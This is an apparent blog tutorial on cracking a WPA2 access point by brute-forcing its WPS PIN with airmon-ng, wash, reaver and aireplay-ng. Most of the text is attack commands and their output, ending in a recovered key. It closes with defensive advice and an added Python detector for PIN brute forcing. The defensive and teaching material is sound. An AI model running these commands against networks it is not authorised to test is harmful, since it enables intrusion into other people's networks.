30 January 2014

Cracking WPA using BackTrack (WPS attack)

1. Some background info
WPS stands for Wireless Protected Setup and it's a protocol designed to simplify connecting clients to wireless networks. Routers provide an 8-digit PIN that clients use to connect. Some also have a button which you can press when a client tries to connect, so that the client is connected automatically without having to enter a key or PIN.

2. The task
In this post we will crack a WPA2-PSK encrypted access point which has WPS enabled and recover both the key and the PIN. For cracking WPA2-PSK with a different method see this post.

3. Requirements
- a laptop/PC with a wireless card that supports packet injection. Check on the Internet whether your wireless card model supports this function;
- BackTrack 5, either as a live CD, live USB or installed on your computer. You can get the latest BackTrack image here;
- a wireless access point configured to use WPA2-PSK encryption which supports WPS and has it enabled.

4. Let's begin
Open a terminal window. First things first, we need to enable monitor mode on our wireless card.

   airmon-ng start wlan0

Now that our wireless card is properly set up, let's find our network. The following command enumerates the wireless access points and clients in range and also gives us some useful information about them:

   airodump-ng mon0

The output is something like this:

 CH 13 ][ Elapsed: 4 s ][ 2014-01-29 14:08

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 80:1F:02:4B:F9:5C  -45        8        0    0  11  54e  WPA2 CCMP   PSK  Edimax AP
 10:BF:48:92:A2:80  -87        5        0    0   1  54e  WPA2 CCMP   PSK  ASUS

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 80:1F:02:4B:F9:5C  60:D8:19:A7:33:21  -50    0 - 5e     0        1

The above output shows us that there are two access points in range, Edimax AP and ASUS, both using WPA2-PSK encryption. We don't know yet whether our target, Edimax AP, has WPS enabled. Let's stop airodump-ng and use wash to check our target:

   wash -i mon0 -c 11

This checks all access points on channel 11. In our case Edimax AP appears to have WPS enabled (output will come soon, forgot to save it).

If you get an error that wash cannot switch to channel 11, it's because airodump-ng hops between channels, and the interface's channel stays set to whichever channel airodump-ng was on when it was stopped. Run this command to switch your interface to channel 11:

   airodump-ng --channel 11 mon0

Time to try and attack it. For that we'll use reaver. Reaver attempts to associate with the target AP and then starts a brute-force attack, trying each PIN combination in turn. Because of the way WPS is designed, although the PIN has 8 digits, there are only 11,000 possible combinations. Unless the correct PIN happens to be the last one reaver tries, it will take fewer attempts than that to find it. Let's fire up reaver and see what comes up:

   reaver -i mon0 -b 80:1F:02:4B:F9:5C -vv

The output will start flowing:

[+] Waiting for beacon from 80:1F:02:4B:F9:5C
[+] Switching mon0 to channel 11
[+] Associated with 80:1F:02:4B:F9:5C (ESSID: Edimax AP)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
...and so on

Quick note: with some routers reaver will not be able to associate. In that case we can associate using aireplay-ng and tell reaver not to attempt association itself. You might also need to have aireplay-ng re-associating constantly. It all depends on the AP model and how its firmware behaves, so you need to play around and experiment. The following command associates using aireplay-ng:

   aireplay-ng --fakeauth 30 -e "Edimax AP" mon0

And this tells reaver that we are associating through some other application:

   reaver -i mon0 -A -b 80:1F:02:4B:F9:5C -vv

After a while, if everything went well, you will get this:

[+] Trying pin 63442519
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 678 seconds
[+] WPS PIN: '63442519'
[+] WPA PSK: 'Test1234'
[+] AP SSID: 'Edimax AP'

Congratulations, you have just cracked the key and the PIN.

5. Alternatives
BackTrack also comes with Fern WIFI Cracker (Exploitation Tools -> Wireless Exploitation Tools -> WLAN Exploitation -> Fern-wifi-cracker-ng), which has a nice GUI for finding targets and attacking them.

6. How to defend
Defending against this attack should be as simple as disabling WPS. However, some routers/APs keep WPS enabled even after you disable it in the settings, and what's worse is that they still respond to reaver's requests. So don't trust the admin page alone: after disabling WPS, check your own AP from the outside with wash, as shown above, to confirm it no longer advertises WPS. Here is a list of various router models and how vulnerable they are to this attack.
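Besides disabling WPS, the per-PIN pattern visible in the reaver output above (EAPOL START, M1 to M4, then a WSC NACK for every rejected PIN) is something a wireless IDS can count. The following is an added example of such a check, not code from the original post; the event records, station MACs and the alert threshold are all constructed assumptions.

```python
"""Flag WPS PIN brute forcing from a stream of observed EAP-WSC messages.

Added wireless-IDS example, not part of the original post. Events are
constructed here as (seconds, station MAC, WSC message) tuples following
the per-PIN pattern in the reaver output above. MACs and the threshold
are assumptions.
"""
from collections import defaultdict, deque

WINDOW_SECONDS = 60     # sliding window for counting rejected PIN tries
MAX_REJECTED = 5        # assumed threshold; a real enrolment rarely fails


def pin_try(t, sta, rejected=True):
    """Constructed events for one PIN attempt, in the order reaver showed it.
    A rejected PIN ends in two NACKs (the AP's, then the client's echo)."""
    msgs = ["EAPOL START", "M1", "M2", "M3", "M4"]
    msgs += ["WSC NACK", "WSC NACK"] if rejected else ["M5", "M6", "M7"]
    return [(t + i, sta, m) for i, m in enumerate(msgs)]


ATTACKER = "02:00:00:00:00:02"   # constructed, locally administered MAC
LEGIT = "02:00:00:00:00:01"      # constructed: mistypes the PIN once, then succeeds
SAMPLE_EVENTS = sorted(
    [e for k in range(8) for e in pin_try(10 * k, ATTACKER)]
    + pin_try(100, LEGIT) + pin_try(200, LEGIT, rejected=False)
)


def rejected_tries(events):
    """Yield (time, station) once per attempt that drew a WSC NACK after M4,
    i.e. the registrar rejected the PIN; the echoed NACK is not counted."""
    awaiting = set()                      # stations that have sent M4
    for t, sta, msg in events:
        if msg == "M4":
            awaiting.add(sta)
        elif msg == "WSC NACK" and sta in awaiting:
            awaiting.discard(sta)
            yield t, sta
        elif msg == "EAPOL START":        # a new attempt resets the state
            awaiting.discard(sta)


def detect_wps_bruteforce(events, window=WINDOW_SECONDS, limit=MAX_REJECTED):
    """Return {station: time of first alert} for stations with `limit` or
    more rejected PIN tries inside any `window`-second span."""
    recent, alerts = defaultdict(deque), {}
    for t, sta in rejected_tries(events):
        q = recent[sta]
        q.append(t)
        while t - q[0] > window:          # drop tries outside the window
            q.popleft()
        if len(q) >= limit and sta not in alerts:
            alerts[sta] = t
    return alerts
```

An AP that keeps answering after this many rejections is also the sign, mentioned above, that its firmware never locks WPS down.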

7. What's next?
Now that we have gained access to the network, it's time to explore it. In the next post we'll see how to discover hosts on it and gather information about them.
